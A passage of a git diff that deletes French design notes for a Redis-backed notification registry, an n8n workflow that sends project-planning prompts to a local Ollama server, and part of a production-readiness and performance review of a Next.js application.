`notifications:count:${userId}`; - private static COUNT_CACHE_TTL = 30; // 30 seconds - - public static getInstance(): NotificationRegistry { - if (!NotificationRegistry.instance) { - NotificationRegistry.instance = new NotificationRegistry(); - } - return NotificationRegistry.instance; - } - - /** - * Enregistre le count d'une source (appelé par les widgets) - */ - async recordCount( - userId: string, - source: string, - count: number, - items?: Array<{ id: string; title: string; message: string; link?: string; timestamp: Date }> - ): Promise<void> { - const redis = getRedisClient(); - const cacheKey = NotificationRegistry.COUNT_CACHE_KEY(userId); - - // Récupérer le count actuel - let currentCount: NotificationCount = { - total: 0, - unread: 0, - sources: {}, - }; - - try { - const cached = await redis.get(cacheKey); - if (cached) { - currentCount = JSON.parse(cached); - } - } catch (error) { - logger.error('[NOTIFICATION_REGISTRY] Error reading cache', { error }); - } - - // Mettre à jour le count pour cette source - const previousSourceCount = currentCount.sources[source]?.unread || 0; - currentCount.sources[source] = { - total: count, - unread: count, - }; - - // Recalculer le total - currentCount.unread = Object.values(currentCount.sources).reduce( - (sum, s) => sum + s.unread, - 0 - ); - currentCount.total = currentCount.unread; - - // Stocker dans le cache - try { - await redis.set( - cacheKey, - JSON.stringify(currentCount), - 'EX', - NotificationRegistry.COUNT_CACHE_TTL - ); - -
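      // Note : la séquence lecture → fusion → écriture ci-dessus n'est pas
      // atomique ; deux sources publiant au même instant peuvent s'écraser.
      // Acceptable ici : chaque widget ré-émet son count à chaque polling
      // et le TTL du cache n'est que de 30 secondes.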
logger.debug('[NOTIFICATION_REGISTRY] Count updated', { - userId, - source, - count, - totalUnread: currentCount.unread, - previousCount: previousSourceCount, - }); - } catch (error) { - logger.error('[NOTIFICATION_REGISTRY] Error updating cache', { error }); - } - } - - /** - * Récupère le count agrégé (appelé par le badge) - */ - async getCount(userId: string): Promise<NotificationCount> { - const redis = getRedisClient(); - const cacheKey = NotificationRegistry.COUNT_CACHE_KEY(userId); - - try { - const cached = await redis.get(cacheKey); - if (cached) { - return JSON.parse(cached); - } - } catch (error) { - logger.error('[NOTIFICATION_REGISTRY] Error reading cache', { error }); - } - - // Si pas de cache, retourner count vide - return { - total: 0, - unread: 0, - sources: {}, - }; - } - - /** - * Récupère les notifications (items) de toutes les sources - */ - async getNotifications(userId: string, limit: number = 20): Promise<any[]> { - // Les widgets stockent leurs items dans Redis avec une clé spécifique - const redis = getRedisClient(); - const sources = ['email', 'rocketchat', 'leantime', 'calendar']; - const allItems: any[] = []; - - for (const source of sources) { - try { - const itemsKey = `notifications:items:${userId}:${source}`; - const items = await redis.get(itemsKey); - if (items) { - const parsed = JSON.parse(items); - allItems.push(...parsed); - } - } catch (error) { - logger.error('[NOTIFICATION_REGISTRY] Error reading items', { source, error }); - } - } - - // Trier par timestamp (plus récent en premier) - allItems.sort((a, b) => - new Date(b.timestamp).getTime() - new Date(a.timestamp).getTime() - ); - - return allItems.slice(0, limit); - } -} -``` - -### 3. Nouvelle API Route : `/api/notifications/update` - -**Fichier :** `app/api/notifications/update/route.ts` - -```typescript -import { NextResponse } from 'next/server'; -import { getServerSession } from 'next-auth'; -import { authOptions } from "@/app/api/auth/options"; -import { NotificationRegistry } from '@/lib/services/notifications/notification-registry'; -import { getRedisClient } from '@/lib/redis'; -import { logger } from '@/lib/logger'; - -export async function POST(request: Request) { - try { - const session = await getServerSession(authOptions); - if (!session?.user?.id) { - return NextResponse.json({ error: "Not authenticated" }, { status: 401 }); - } - - const { source, count, items } = await request.json(); - - if (!source || typeof count !== 'number') { - return NextResponse.json( - { error: "Invalid request: source and count required" }, - { status: 400 } - ); - } - - const registry = NotificationRegistry.getInstance(); - - // Enregistrer le count - await registry.recordCount(session.user.id, source, count, items); - - // Si des items sont fournis, les stocker aussi - if (items && Array.isArray(items)) { - const redis = getRedisClient(); - const itemsKey = `notifications:items:${session.user.id}:${source}`; - - // Stocker les items (limiter à 50 par source) - await redis.set( - itemsKey, - JSON.stringify(items.slice(0, 50)), - 'EX', - 300 // 5 minutes TTL - ); - } - - logger.debug('[NOTIFICATIONS_UPDATE] Count updated', { - userId: session.user.id, - source, - count, - itemsCount: items?.length || 0, - }); - - return NextResponse.json({ success: true }); - } catch (error: any) { - logger.error('[NOTIFICATIONS_UPDATE] Error', { error: error.message }); - return NextResponse.json( - { error: "Internal server error", message: error.message }, - { status: 500 } - ); - } -} -``` - -### 4.
Modification des Widgets - -#### Widget Courrier - -```typescript -// components/email.tsx -import { useWidgetNotification } from '@/hooks/use-widget-notification'; - -export function Email() { - const { triggerNotification } = useWidgetNotification(); - const [unreadCount, setUnreadCount] = useState(0); - const [emails, setEmails] = useState([]); - const lastUnreadCountRef = useRef(-1); - - const fetchEmails = async (forceRefresh = false) => { - // ... fetch emails ... - - // Calculer le unread count - const currentUnreadCount = emails.filter(e => !e.read).length; - - // Si le count a changé, déclencher notification - if (currentUnreadCount !== lastUnreadCountRef.current) { - lastUnreadCountRef.current = currentUnreadCount; - - // Préparer les items pour les notifications - const notificationItems = emails - .filter(e => !e.read) - .slice(0, 10) - .map(email => ({ - id: email.id, - title: email.subject, - message: `De ${email.fromName || email.from}`, - link: `/courrier`, - timestamp: new Date(email.date), - })); - - // Déclencher notification - await triggerNotification({ - source: 'email', - count: currentUnreadCount, - items: notificationItems, - }); - } - }; -} -``` - -#### Widget Parole - -```typescript -// components/parole.tsx -import { useWidgetNotification } from '@/hooks/use-widget-notification'; - -export function Parole() { - const { triggerNotification } = useWidgetNotification(); - const [unreadCount, setUnreadCount] = useState(0); - const lastUnreadCountRef = useRef(-1); - - const fetchMessages = async (forceRefresh = false) => { - // ... fetch messages ... - - const currentUnreadCount = data.totalUnreadCount || 0; - - // Si le count a changé, déclencher notification - if (currentUnreadCount !== lastUnreadCountRef.current) { - lastUnreadCountRef.current = currentUnreadCount; - - // Préparer les items pour les notifications - const notificationItems = messages - .slice(0, 10) - .map(msg => ({ - id: msg.id, - title: msg.sender.name, - message: msg.text, - link: `/parole`, - timestamp: new Date(msg.rawTimestamp), - })); - - await triggerNotification({ - source: 'rocketchat', - count: currentUnreadCount, - items: notificationItems, - }); - } - }; -} -``` - -#### Widget Devoirs - -```typescript -// components/flow.tsx -import { useWidgetNotification } from '@/hooks/use-widget-notification'; - -export function Duties() { - const { triggerNotification } = useWidgetNotification(); - const [tasks, setTasks] = useState([]); - const lastTaskCountRef = useRef(-1); - - const fetchTasks = async (forceRefresh = false) => { - // ... fetch tasks ... - - const currentTaskCount = filteredTasks.length; - - // Si le count a changé, déclencher notification - if (currentTaskCount !== lastTaskCountRef.current) { - lastTaskCountRef.current = currentTaskCount; - - // Préparer les items pour les notifications - const notificationItems = filteredTasks - .slice(0, 10) - .map(task => ({ - id: task.id.toString(), - title: task.headline, - message: `Due: ${formatDate(task.dateToFinish)}`, - link: task.source === 'twenty-crm' - ? 
(task as any).url - : `https://agilite.slm-lab.net/tickets/showTicket/${task.id}`, - timestamp: new Date(task.dateToFinish || Date.now()), - })); - - await triggerNotification({ - source: 'leantime', - count: currentTaskCount, - items: notificationItems, - }); - } - }; -} -``` - -#### Widget Agenda - -```typescript -// components/calendar/calendar-widget.tsx -import { useWidgetNotification } from '@/hooks/use-widget-notification'; - -export function CalendarWidget() { - const { triggerNotification } = useWidgetNotification(); - const [events, setEvents] = useState([]); - const lastEventCountRef = useRef(-1); - - const fetchUpcomingEvents = async () => { - // ... fetch events ... - - // Filtrer les événements à venir (aujourd'hui et demain) - const now = new Date(); - const tomorrow = addDays(now, 1); - const upcomingEvents = allEvents - .filter(event => event.start >= now && event.start <= tomorrow) - .slice(0, 10); - - const currentEventCount = upcomingEvents.length; - - // Si le count a changé, déclencher notification - if (currentEventCount !== lastEventCountRef.current) { - lastEventCountRef.current = currentEventCount; - - // Préparer les items pour les notifications - const notificationItems = upcomingEvents.map(event => ({ - id: event.id, - title: event.title, - message: `Le ${format(event.start, 'dd/MM à HH:mm')}`, - link: `/agenda`, - timestamp: event.start, - })); - - await triggerNotification({ - source: 'calendar', - count: currentEventCount, - items: notificationItems, - }); - } - }; -} -``` - -### 5. Simplification de `/api/notifications/count` - -**Fichier :** `app/api/notifications/count/route.ts` - -```typescript -import { NextResponse } from 'next/server'; -import { getServerSession } from 'next-auth'; -import { authOptions } from "@/app/api/auth/options"; -import { NotificationRegistry } from '@/lib/services/notifications/notification-registry'; - -export async function GET(request: Request) { - try { - const session = await getServerSession(authOptions); - if (!session?.user?.id) { - return NextResponse.json({ error: "Not authenticated" }, { status: 401 }); - } - - const registry = NotificationRegistry.getInstance(); - const counts = await registry.getCount(session.user.id); - - return NextResponse.json(counts); - } catch (error: any) { - return NextResponse.json( - { error: "Internal server error", message: error.message }, - { status: 500 } - ); - } -} -``` - -### 6. 
Simplification de `/api/notifications` - -**Fichier :** `app/api/notifications/route.ts` - -```typescript -import { NextResponse } from 'next/server'; -import { getServerSession } from 'next-auth'; -import { authOptions } from "@/app/api/auth/options"; -import { NotificationRegistry } from '@/lib/services/notifications/notification-registry'; - -export async function GET(request: Request) { - try { - const session = await getServerSession(authOptions); - if (!session?.user?.id) { - return NextResponse.json({ error: "Not authenticated" }, { status: 401 }); - } - - const { searchParams } = new URL(request.url); - const limit = parseInt(searchParams.get('limit') || '20', 10); - - const registry = NotificationRegistry.getInstance(); - const notifications = await registry.getNotifications(session.user.id, limit); - - return NextResponse.json({ - notifications, - total: notifications.length, - }); - } catch (error: any) { - return NextResponse.json( - { error: "Internal server error", message: error.message }, - { status: 500 } - ); - } -} -``` - ---- - -## 📊 Comparaison : Avant vs Après - -### Avant ❌ - -**Code** : -- `LeantimeAdapter` : ~550 lignes -- `RocketChatAdapter` : ~540 lignes -- `EmailAdapter` : ~410 lignes -- `NotificationService` : ~425 lignes -- **Total** : ~1925 lignes - -**Appels API** : -- Polling notifications : 1 toutes les 30s -- Polling Leantime : 1 toutes les 30s (via adapter) -- Polling RocketChat : 1 toutes les 30s (via adapter) -- Polling Email : 1 toutes les 30s (via adapter) -- **Total** : 4 appels toutes les 30s - -**Complexité** : -- 3 adapters à maintenir -- Logique de fetch dupliquée -- Risque de désynchronisation - -### Après ✅ - -**Code** : -- `NotificationRegistry` : ~150 lignes -- `useWidgetNotification` : ~50 lignes -- Modifications widgets : ~20 lignes chacun -- **Total** : ~280 lignes (-85% de code) - -**Appels API** : -- Widgets pollent déjà (pas de changement) -- Notifications : Event-driven uniquement -- **Total** : 0 appels supplémentaires (réduction de 100%) - -**Complexité** : -- 1 registry simple -- Pas de duplication -- Source unique de vérité - ---- - -## 🎯 Avantages Spécifiques - -### 1. **Simplicité** -- ✅ **-85% de code** : De ~1925 lignes à ~280 lignes -- ✅ **Pas d'adapters complexes** : Suppression de LeantimeAdapter, RocketChatAdapter, EmailAdapter -- ✅ **Architecture claire** : Widgets → Registry → Badge - -### 2. **Performance** -- ✅ **0 appels API supplémentaires** : Les widgets font déjà le travail -- ✅ **Event-driven** : Notifications uniquement quand nécessaire -- ✅ **Cache optimisé** : Un seul cache au lieu de 4 - -### 3. **Maintenance** -- ✅ **Un seul endroit à modifier** : Les widgets -- ✅ **Pas de désynchronisation** : Impossible d'avoir des notifications sans widget -- ✅ **Facile à étendre** : Ajouter un widget = ajouter un trigger - -### 4. **Cohérence** -- ✅ **Source unique de vérité** : Les widgets sont la source -- ✅ **Notifications = Widgets** : Si le widget voit, la notification voit -- ✅ **UX cohérente** : Mêmes données partout - ---- - -## 🚨 Points d'Attention - -### 1. **Initialisation** -- Au premier chargement, les widgets doivent déclencher les notifications -- Le badge doit attendre que les widgets soient chargés - -**Solution** : -- Les widgets déclenchent au mount -- Le badge affiche 0 si pas encore initialisé - -### 2. 
**Widgets non chargés** -- Si un widget n'est pas sur la page, pas de notifications pour cette source - -**Solution** : -- C'est acceptable : si le widget n'est pas visible, pas besoin de notification -- Les notifications reflètent ce que l'utilisateur voit - -### 3. **Marquer comme lu** -- Comment marquer une notification comme lue si elle vient d'un widget ? - -**Solution** : -- Quand l'utilisateur clique sur une notification, ouvrir le widget -- Le widget met à jour son état (email lu, message lu, etc.) -- Le widget redéclenche la notification avec le nouveau count -- Le badge se met à jour automatiquement - -### 4. **Historique** -- Comment garder un historique des notifications si elles viennent des widgets ? - -**Solution** : -- Stocker les items dans Redis (déjà prévu dans le code) -- TTL de 5 minutes pour les items -- Le dropdown affiche les items stockés - ---- - -## 📝 Plan de Migration - -### Phase 1 : Créer la nouvelle infrastructure -1. ✅ Créer `useWidgetNotification` hook -2. ✅ Créer `NotificationRegistry` service -3. ✅ Créer `/api/notifications/update` endpoint -4. ✅ Simplifier `/api/notifications/count` -5. ✅ Simplifier `/api/notifications` - -### Phase 2 : Intégrer dans les widgets -6. ✅ Modifier Widget Courrier -7. ✅ Modifier Widget Parole -8. ✅ Modifier Widget Devoirs -9. ✅ Modifier Widget Agenda - -### Phase 3 : Nettoyer l'ancien code -10. ❌ Supprimer `LeantimeAdapter` -11. ❌ Supprimer `RocketChatAdapter` -12. ❌ Supprimer `EmailAdapter` -13. ❌ Simplifier `NotificationService` (ou le supprimer) - -### Phase 4 : Tests et validation -14. ✅ Tester chaque widget -15. ✅ Tester le badge -16. ✅ Tester le dropdown -17. ✅ Vérifier les performances - ---- - -## ✅ Conclusion - -Cette architecture simplifiée est **beaucoup plus maintenable** et **performante** que l'actuelle. Elle élimine la duplication de code, réduit les appels API, et garantit la cohérence entre widgets et notifications. - -**Recommandation** : Implémenter cette architecture pour simplifier significativement le système de notifications. diff --git a/NeahMissionGeneratePlan.json b/NeahMissionGeneratePlan.json deleted file mode 100644 index 1099ac1..0000000 --- a/NeahMissionGeneratePlan.json +++ /dev/null @@ -1,139 +0,0 @@ -{ - "name": "NeahMissionGeneratePlan", - "nodes": [ - { - "parameters": { - "httpMethod": "POST", - "path": "GeneratePlan", - "responseMode": "lastNode", - "responseData": "allEntries", - "options": {} - }, - "name": "Webhook GeneratePlan", - "type": "n8n-nodes-base.webhook", - "typeVersion": 1, - "position": [ - -1040, - -32 - ], - "id": "28206383-afc0-472a-81f2-c99dc1e14f24", - "webhookId": "633b32e3-07c3-4e82-8e27-9ea4d6ec28e9" - }, - { - "parameters": { - "jsCode": "// Build Project Action Plan Prompt (Senior Project Manager)\n\n// 1. Read input safely\nconst query = $input.item.json.query || \"\";\nconst mission = $input.item.json.mission;\nconst model = $input.item.json.model || \"qwen3:8b\";\n\n// 2. Handle case: no mission provided\nif (!mission) {\n return {\n json: {\n response_prompt: `No mission details were provided.\nPolitely ask the user to supply the mission context required to build a project action plan.`,\n num_predict: 300,\n model: model,\n query: query\n }\n };\n}\n\n// 3. Normalize mission fields (safe defaults)\nconst {\n name = \"Unnamed Mission\",\n oddScope = [],\n niveau = \"B\",\n intention = \"\",\n missionType = \"\",\n donneurDOrdre = \"\",\n projection = \"\",\n services = [],\n profils = []\n} = mission;\n\n// 4. 
Construct the Senior Project Manager Prompt\nconst prompt = `\nYou are a Senior Project Manager with extensive experience leading large-scale, complex and cross-functional projects for organizations, NGOs and startups.\n\nMISSION CONTEXT:\n- Mission name: ${name}\n- Mission scope (UN SDGs): ${oddScope.length ? oddScope.join(\", \") : \"Not specified\"}\n- Mission complexity level: ${niveau}\n- Mission intention: ${intention}\n- Mission type: ${missionType}\n- Ordering organization: ${donneurDOrdre}\n- Time projection: ${projection}\n- Services involved: ${services.length ? services.join(\", \") : \"None specified\"}\n- Required profiles: ${profils.length ? profils.join(\", \") : \"Not specified\"}\n\nTASK:\nProduce a clear, structured, and actionable ACTION PLAN as a senior project manager would do at the start of a major project.\n\nCRITICAL INSTRUCTIONS:\n- Respond ONLY in English.\n- Write as a senior project manager, not as a consultant or academic.\n- Focus on execution, structure, governance, and delivery.\n- Do NOT restate the mission description.\n- Do NOT use motivational or generic language.\n- Assume a complex, long-term mission with multiple stakeholders.\n- Be concise, concrete, and pragmatic.\n\nSTRUCTURE YOUR RESPONSE USING THE FOLLOWING SECTIONS:\n\n1. Mission Framing & Strategic Intent \nClarify the real objective of the mission, key constraints, and strategic priorities.\n\n2. Success Criteria & KPIs \nDefine how success will be measured (operational, impact, and sustainability metrics).\n\n3. Execution Roadmap \nBreak the mission into clear phases (e.g. initiation, build, deployment, scaling) with concrete outcomes per phase.\n\n4. Team Structure & Governance \nExplain how the different profiles will collaborate, decision-making model, and coordination mechanisms.\n\n5. Key Risks & Mitigation Plan \nIdentify major delivery, technical, organizational, and stakeholder risks and how to mitigate them.\n\n6. Delivery & Impact Measurement \nExplain how results will be delivered, validated, and aligned with the relevant UN SDGs over time.\n\nWrite in a professional, structured format, using short paragraphs or bullet points where relevant.\n`;\n\n// 5. 
Return LLM payload\nreturn {\n json: {\n response_prompt: prompt,\n num_predict: 2500,\n model: model,\n query: query\n }\n};\n" - }, - "name": "Process Prompt for Ollama", - "type": "n8n-nodes-base.code", - "typeVersion": 2, - "position": [ - -736, - -32 - ], - "id": "6f0cdeb3-b5b5-4d2c-b13c-468eb92f0a52" - }, - { - "parameters": { - "method": "POST", - "url": "http://172.16.0.117:11434/api/generate", - "sendBody": true, - "specifyBody": "json", - "jsonBody": "={{ {\n \"model\": $json.model,\n \"prompt\": $json.response_prompt,\n \"stream\": false,\n \"options\": {\n \"temperature\": 0.3,\n \"top_p\": 0.9,\n \"num_predict\": $json.num_predict\n }\n} }}", - "options": {} - }, - "type": "n8n-nodes-base.httpRequest", - "typeVersion": 4.3, - "position": [ - -528, - -32 - ], - "id": "5918cf24-0473-44f7-9d36-c05d9b73039b", - "name": "HTTP Request" - }, - { - "parameters": { - "jsCode": "// Clean Theme Response\nconst response = $input.item.json.response || $input.item.json.body?.response || '';\nlet cleanedResponse = response;\nif (cleanedResponse.includes('</think>')) {\n cleanedResponse = cleanedResponse.split('</think>')[1] || cleanedResponse;\n}\nreturn { json: { response: cleanedResponse.trim(), query: $input.item.json.query } };" - }, - "type": "n8n-nodes-base.code", - "typeVersion": 2, - "position": [ - -320, - -32 - ], - "id": "5b029d07-b152-49b8-a269-8331e57b898f", - "name": "Clean Response" - }, - { - "parameters": { - "respondWith": "json", - "responseBody": "{{ { \"response\": $json.response } }}", - "options": {} - }, - "type": "n8n-nodes-base.respondToWebhook", - "typeVersion": 1.4, - "position": [ - -112, - -32 - ], - "id": "38099abd-8ac8-42e6-a400-dbbffbf14f04", - "name": "Respond to Webhook" - } - ], - "pinData": {}, - "connections": { - "Webhook GeneratePlan": { - "main": [ - [ - { - "node": "Process Prompt for Ollama", - "type": "main", - "index": 0 - } - ] - ] - }, - "Process Prompt for Ollama": { - "main": [ - [ - { - "node": "HTTP Request", - "type": "main", - "index": 0 - } - ] - ] - }, - "HTTP Request": { - "main": [ - [ - { - "node": "Clean Response", - "type": "main", - "index": 0 - } - ] - ] - }, - "Clean Response": { - "main": [ - [ - { - "node": "Respond to Webhook", - "type": "main", - "index": 0 - } - ] - ] - } - }, - "active": true, - "settings": { - "executionOrder": "v1" - }, - "versionId": "6ce946c6-c278-43d0-acfe-1fe814c4f963", - "meta": { - "instanceId": "21947434c58170635d41cc9137ebeab13a628beaa4cf8318a6d7c90f9b354219" - }, - "id": "k34Oeva3jxsmDg9M", - "tags": [] -} \ No newline at end of file diff --git a/PERFORMANCE_AND_PRODUCTION_ANALYSIS.md b/PERFORMANCE_AND_PRODUCTION_ANALYSIS.md deleted file mode 100644 index eda6ea5..0000000 --- a/PERFORMANCE_AND_PRODUCTION_ANALYSIS.md +++ /dev/null @@ -1,695 +0,0 @@ -# Analyse Performance et Préparation Production - Neah - -**Date:** $(date) -**Auteur:** Analyse Senior Developer -**Version:** 1.0 - ---- - -## 📋 Table des Matières - -1. [Résumé Exécutif](#résumé-exécutif) -2. [Analyse des Performances](#analyse-des-performances) -3. [Problèmes de Configuration Production](#problèmes-de-configuration-production) -4. [Sécurité](#sécurité) -5. [Recommandations Prioritaires](#recommandations-prioritaires) -6.
[Checklist de Mise en Production](#checklist-de-mise-en-production) - ---- - -## 🎯 Résumé Exécutif - -### État Actuel -- ✅ **Architecture solide**: Next.js 16, Prisma, Redis, PostgreSQL -- ✅ **Bonnes pratiques**: Logging structuré, gestion d'erreurs, cache Redis -- ⚠️ **Problèmes critiques**: Configuration DB pool, timeouts HTTP, logs console -- ⚠️ **Production readiness**: 70% - Nécessite corrections avant déploiement - -### Priorités -1. **CRITIQUE** - Configuration pool de connexions Prisma -2. **CRITIQUE** - Correction Dockerfile (migrate dev → deploy) -3. **HAUTE** - Ajout de timeouts sur toutes les requêtes HTTP -4. **HAUTE** - Remplacement console.log par logger structuré -5. **MOYENNE** - Optimisation images Next.js -6. **MOYENNE** - Rate limiting et circuit breakers - ---- - -## 🔍 Analyse des Performances - -### 1. Base de Données (PostgreSQL) - -#### ❌ Problèmes Identifiés - -**1.1 Pool de Connexions Non Configuré** -```typescript -// lib/prisma.ts - ACTUEL -export const prisma = new PrismaClient({ - datasources: { db: { url: env.DATABASE_URL } }, - log: process.env.NODE_ENV === 'production' ? [] : ['query'], -}) -``` - -**Problème:** -- Pas de limite de connexions -- Risque d'épuisement du pool sous charge -- Pas de configuration de timeout -- Pas de monitoring des connexions - -**Impact:** 🔴 **CRITIQUE** - Peut causer des timeouts et crashes en production - -**Solution Recommandée:** -```typescript -// lib/prisma.ts - RECOMMANDÉ -export const prisma = new PrismaClient({ - datasources: { - db: { - url: env.DATABASE_URL - } - }, - log: process.env.NODE_ENV === 'production' ? [] : ['error', 'warn'], -}) - -// Configuration du pool via DATABASE_URL -// DATABASE_URL=postgresql://user:pass@host:5432/db?connection_limit=10&pool_timeout=20 -``` - -**Configuration DATABASE_URL recommandée:** -``` -postgresql://user:pass@host:5432/db?connection_limit=10&pool_timeout=20&connect_timeout=10 -``` - -**1.2 Requêtes N+1 Potentielles** - -**Fichiers à vérifier:** -- `app/api/missions/route.ts` - Include multiples relations -- `app/api/missions/all/route.ts` - Include missionUsers avec user -- `app/api/calendars/route.ts` - Vérifier les requêtes imbriquées - -**Recommandation:** Utiliser `select` au lieu de `include` quand possible, ou utiliser `Prisma.raw` pour des requêtes optimisées. - ---- - -### 2. Requêtes HTTP Externes - -#### ❌ Problèmes Identifiés - -**2.1 Timeouts Manquants** - -**Fichiers affectés:** -- `lib/services/n8n-service.ts` - Pas de timeout sur fetch -- `app/api/missions/[missionId]/generate-plan/route.ts` - Pas de timeout -- `app/api/users/[userId]/route.ts` - Pas de timeout sur Leantime API -- `app/api/rocket-chat/messages/route.ts` - Timeouts partiels -- `app/api/leantime/tasks/route.ts` - Pas de timeout - -**Exemple problématique:** -```typescript -// ❌ MAUVAIS - app/api/missions/[missionId]/generate-plan/route.ts -const response = await fetch(webhookUrl, { - method: 'POST', - headers: { 'Content-Type': 'application/json', 'x-api-key': apiKey }, - body: JSON.stringify(webhookData), -}); -// Pas de timeout - peut bloquer indéfiniment -``` - -**Solution Recommandée:** -```typescript -// ✅ BON -const controller = new AbortController(); -const timeoutId = setTimeout(() => controller.abort(), 30000); // 30s timeout - -try { - const response = await fetch(webhookUrl, { - method: 'POST', - headers: { 'Content-Type': 'application/json', 'x-api-key': apiKey }, - body: JSON.stringify(webhookData), - signal: controller.signal, - }); - clearTimeout(timeoutId); - // ... 
handle response -} catch (error) { - clearTimeout(timeoutId); - if (error.name === 'AbortError') { - throw new Error('Request timeout after 30s'); - } - throw error; -} -``` - -**2.2 Pas de Circuit Breaker** - -**Problème:** Si un service externe (N8N, Leantime, RocketChat) est down, toutes les requêtes échouent sans retry intelligent. - -**Recommandation:** Implémenter un circuit breaker pattern: -```typescript -// lib/utils/circuit-breaker.ts -class CircuitBreaker { - private failures = 0; - private lastFailureTime = 0; - private state: 'CLOSED' | 'OPEN' | 'HALF_OPEN' = 'CLOSED'; - - async execute<T>(fn: () => Promise<T>): Promise<T> { - if (this.state === 'OPEN') { - if (Date.now() - this.lastFailureTime > 60000) { - this.state = 'HALF_OPEN'; - } else { - throw new Error('Circuit breaker is OPEN'); - } - } - - try { - const result = await fn(); - this.onSuccess(); - return result; - } catch (error) { - this.onFailure(); - throw error; - } - } - - private onSuccess() { - this.failures = 0; - this.state = 'CLOSED'; - } - - private onFailure() { - this.failures++; - this.lastFailureTime = Date.now(); - if (this.failures >= 5) { - this.state = 'OPEN'; - } - } -} -``` - ---- - -### 3. Cache et Optimisations - -#### ✅ Points Positifs -- Redis utilisé pour cache emails, notifications, messages -- Request deduplication implémentée (`lib/utils/request-deduplication.ts`) -- Cache avec TTL approprié - -#### ⚠️ Améliorations Possibles - -**3.1 Cache Database Queries** -```typescript -// Exemple: app/api/missions/route.ts -// Ajouter cache pour les requêtes fréquentes -const cacheKey = `missions:${userId}:${limit}:${offset}`; -const cached = await redis.get(cacheKey); -if (cached) return JSON.parse(cached); - -const missions = await prisma.mission.findMany(...); -await redis.setex(cacheKey, 60, JSON.stringify(missions)); // 60s TTL -``` - -**3.2 Optimisation Images Next.js** - -**Problème actuel:** -```javascript -// next.config.mjs -images: { - unoptimized: true, // ❌ Désactive l'optimisation -} -``` - -**Solution:** -```javascript -images: { - unoptimized: false, // ✅ Active l'optimisation - formats: ['image/avif', 'image/webp'], - deviceSizes: [640, 750, 828, 1080, 1200], - imageSizes: [16, 32, 48, 64, 96, 128, 256, 384], -} -``` - ---- - -### 4. WebSocket et Connexions Longues - -#### ⚠️ Problèmes Identifiés - -**4.1 RocketChat Call Listener** -- `lib/services/rocketchat-call-listener.ts` -- Pas de rate limiting sur reconnexions -- Pas de backoff exponentiel optimal -- Logs console.log excessifs (35 occurrences) - -**Recommandations:** -```typescript -// Améliorer le backoff -private reconnectDelay = 3000; -private maxReconnectAttempts = 10; - -// ✅ MEILLEUR -private getReconnectDelay(): number { - return Math.min(3000 * Math.pow(2, this.reconnectAttempts), 30000); -} -``` - -**4.2 IMAP Connection Pool** -- `lib/services/email-service.ts` -- Pool bien géré mais peut être optimisé -- Timeout de 30 minutes peut être réduit - ---- - -### 5.
Logging et Monitoring - -#### ❌ Problèmes Critiques - -**5.1 Console.log en Production** - -**Statistiques:** -- 110 occurrences de `console.log/error/warn/debug` dans `lib/services/` -- 35 dans `rocketchat-call-listener.ts` -- 19 dans `refresh-manager.ts` -- 17 dans `prefetch-service.ts` - -**Impact:** -- Performance dégradée (console.log est synchrone) -- Logs non structurés -- Pas de centralisation - -**Solution:** -```typescript -// Remplacer tous les console.log par logger -// ❌ AVANT -console.log('[ROCKETCHAT] Message received', data); - -// ✅ APRÈS -logger.debug('[ROCKETCHAT] Message received', { data }); -``` - -**Action:** Créer un script de migration: -```bash -# scripts/replace-console-logs.sh -find lib/services -name "*.ts" -exec sed -i '' 's/console\.log/logger.debug/g' {} \; -find lib/services -name "*.ts" -exec sed -i '' 's/console\.error/logger.error/g' {} \; -find lib/services -name "*.ts" -exec sed -i '' 's/console\.warn/logger.warn/g' {} \; -``` - -**5.2 Pas de Métriques de Performance** - -**Recommandation:** Ajouter des métriques: -```typescript -// lib/utils/metrics.ts -export function trackApiCall(endpoint: string, duration: number) { - // Envoyer à un service de métriques (DataDog, New Relic, etc.) - logger.info('API_CALL', { endpoint, duration }); -} -``` - ---- - -## 🏗️ Problèmes de Configuration Production - -### 1. Dockerfile - -#### ❌ Problème Critique - -**Fichier:** `Dockerfile` - -```dockerfile -# ❌ MAUVAIS - Ligne 18 -RUN npx prisma migrate dev --name init -``` - -**Problème:** -- `migrate dev` crée une nouvelle migration même si la DB est à jour -- Ne doit JAMAIS être utilisé en production -- Peut causer des conflits de migrations - -**Solution:** -```dockerfile -# ✅ BON -# Ne pas faire de migrations dans le Dockerfile -# Les migrations doivent être appliquées séparément avant le déploiement -# RUN npx prisma migrate deploy # Seulement si nécessaire, et seulement en production -``` - -**Recommandation:** Utiliser `Dockerfile.prod` qui est mieux configuré, mais vérifier qu'il n'utilise pas `migrate dev`. - -### 2. Next.js Configuration - -#### ⚠️ Problèmes - -**Fichier:** `next.config.mjs` - -```javascript -// ❌ PROBLÉMATIQUE -eslint: { - ignoreDuringBuilds: true, // Cache les erreurs ESLint -}, -typescript: { - ignoreBuildErrors: true, // Cache les erreurs TypeScript -}, -images: { - unoptimized: true, // Désactive l'optimisation d'images -}, -``` - -**Recommandation:** -```javascript -// ✅ MEILLEUR -eslint: { - ignoreDuringBuilds: false, // Ou au moins en staging -}, -typescript: { - ignoreBuildErrors: false, // Corriger les erreurs TypeScript -}, -images: { - unoptimized: false, // Activer l'optimisation - formats: ['image/avif', 'image/webp'], -}, -``` - -### 3. Variables d'Environnement - -#### ⚠️ Vérifications Nécessaires - -**Variables critiques à vérifier:** -- `DATABASE_URL` - Doit inclure les paramètres de pool -- `REDIS_URL` - Doit être configuré avec timeout -- `NEXTAUTH_SECRET` - Doit être unique et fort -- Tous les tokens API (N8N, Leantime, RocketChat) - -**Recommandation:** Créer un script de validation: -```typescript -// scripts/validate-env.ts -const requiredVars = [ - 'DATABASE_URL', - 'NEXTAUTH_SECRET', - 'NEXTAUTH_URL', - // ... -]; - -for (const varName of requiredVars) { - if (!process.env[varName]) { - throw new Error(`Missing required environment variable: ${varName}`); - } -} -``` - ---- - -## 🔒 Sécurité - -### 1. 
